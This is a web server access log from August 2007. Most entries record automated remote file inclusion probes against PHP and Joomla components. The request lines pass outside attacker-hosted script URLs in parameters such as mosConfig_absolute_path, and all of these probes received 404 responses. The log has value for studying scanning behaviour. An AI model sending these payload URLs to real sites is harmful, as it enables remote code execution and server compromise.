209.172.32.44 - - [26/Aug/2007:14:54:48 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.44 - - [26/Aug/2007:14:54:48 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.20.65.213 - - [26/Aug/2007:14:55:08 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:55:08 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.20.65.213 - - [26/Aug/2007:14:55:08 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:55:08 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:55:08 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.118.86.55 - - [26/Aug/2007:14:55:13 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:55:40 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:55:40 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:55:41 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:55:47 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:55:57 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:57:26 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:57:26 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.246.252.43 - - [26/Aug/2007:14:57:26 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:57:31 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:57:53 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:57:53 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:57:53 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:57:55 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:57:55 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:57:56 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:58:00 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:58:02 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:59:39 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:59:40 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:59:40 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:59:46 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.94.147.177 - - [26/Aug/2007:15:00:50 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.147.177 - - [26/Aug/2007:15:00:50 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
219.94.147.177 - - [26/Aug/2007:15:00:50 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.147.177 - - [26/Aug/2007:15:00:56 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:15:02:46 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.29.212.240 - - [26/Aug/2007:15:06:28 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.29.212.240 - - [26/Aug/2007:15:06:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.0.182.62 - - [26/Aug/2007:15:08:12 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.0.182.62 - - [26/Aug/2007:15:08:13 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.0.182.62 - - [26/Aug/2007:15:08:13 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.0.182.62 - - [26/Aug/2007:15:08:20 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.78.98.108 - - [26/Aug/2007:15:10:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.18.113.71 - - [26/Aug/2007:15:11:13 -0700] "GET /logs/access_070716.log/index.php?file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.18.113.71 - - [26/Aug/2007:15:11:14 -0700] "GET /index.php?file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.18.113.71 - - [26/Aug/2007:15:11:14 -0700] "GET /logs/index.php?file=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.58.204.206 - - [26/Aug/2007:15:11:46 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?hl=en&q=lesbianas" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.galf.org"
38.99.13.122 - - [26/Aug/2007:15:11:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
213.194.149.56 - - [26/Aug/2007:15:11:57 -0700] "GET /logs/access_070716.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:15:11:57 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:15:15:02 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:15:15:02 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:15:15:03 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:15:15:09 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.18.118.81 - - [26/Aug/2007:15:16:26 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:15:17:12 -0700] "GET /logs/access_070618.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.20.65.213 - - [26/Aug/2007:15:18:10 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:15:18:53 -0700] "GET /logs/scripts.log/index.php3?aide=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.105.162 - - [26/Aug/2007:15:18:55 -0700] "GET /index.php3?aide=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:15:18:55 -0700] "GET /logs/index.php3?aide=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.30.60.158 - - [26/Aug/2007:15:23:38 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [26/Aug/2007:15:23:39 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [26/Aug/2007:15:23:39 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [26/Aug/2007:15:23:47 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.99.239.51 - - [26/Aug/2007:15:25:05 -0700] "GET /logs/access_070806.log/index1.php?pag=http://www.puredynamics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.99.239.51 - - [26/Aug/2007:15:26:08 -0700] "GET /logs/access_070813.log/index1.php?pag=http://www.puredynamics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:15:26:37 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:15:26:38 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:15:26:40 -0700] "GET /logs/index.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:15:26:40 -0700] "GET /index.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:15:27:04 -0700] "GET /logs/access_070723.log/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.53.47.66 - - [26/Aug/2007:15:27:04 -0700] "GET /index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:15:27:04 -0700] "GET /logs/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:15:27:04 -0700] "GET /logs/access_070813.log/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.176.87 - - [26/Aug/2007:15:29:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/jetyn171/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
84.19.176.87 - - [26/Aug/2007:15:29:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/jetyn171/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.176.87 - - [26/Aug/2007:15:29:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/jetyn171/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.176.87 - - [26/Aug/2007:15:29:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/jetyn171/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:15:31:45 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:15:31:46 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.152.128.49 - - [26/Aug/2007:15:33:09 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)"
83.18.159.125 - - [26/Aug/2007:15:33:24 -0700] "GET /index.php?pag=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:15:33:25 -0700] "GET /logs/index.php?pag=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:15:34:34 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:15:34:43 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [26/Aug/2007:15:34:44 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [26/Aug/2007:15:34:44 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [26/Aug/2007:15:34:53 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.2.169.150 - - [26/Aug/2007:15:35:34 -0700] "GET /logs/access_070813.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [26/Aug/2007:15:35:36 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.2.169.150 - - [26/Aug/2007:15:35:43 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:15:44:42 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [26/Aug/2007:15:44:42 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
195.242.211.140 - - [26/Aug/2007:15:45:42 -0700] "GET /logs/access_070806.log/display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
195.242.211.140 - - [26/Aug/2007:15:45:43 -0700] "GET /display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
195.242.211.140 - - [26/Aug/2007:15:45:43 -0700] "GET /logs/display.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
213.188.35.62 - - [26/Aug/2007:15:47:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.188.35.62 - - [26/Aug/2007:15:47:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.44.38.218 - - [26/Aug/2007:15:49:05 -0700] "GET /logs/access_070716.log/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.44.38.218 - - [26/Aug/2007:15:49:08 -0700] "GET /index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
194.44.38.218 - - [26/Aug/2007:15:49:10 -0700] "GET /logs/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.91.249.99 - - [26/Aug/2007:15:49:10 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.91.249.99 - - [26/Aug/2007:15:49:10 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://breakthru.us/images/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.97.20.22 - - [26/Aug/2007:15:51:11 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [26/Aug/2007:15:51:12 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
38.100.41.98 - - [26/Aug/2007:15:55:06 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "galf.org"
38.100.41.98 - - [26/Aug/2007:15:55:35 -0700] "GET /?sid HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
74.6.23.12 - - [26/Aug/2007:15:57:23 -0700] "GET /logs/access_070820.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.98.105.162 - - [26/Aug/2007:16:01:07 -0700] "GET /logs/access.log/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
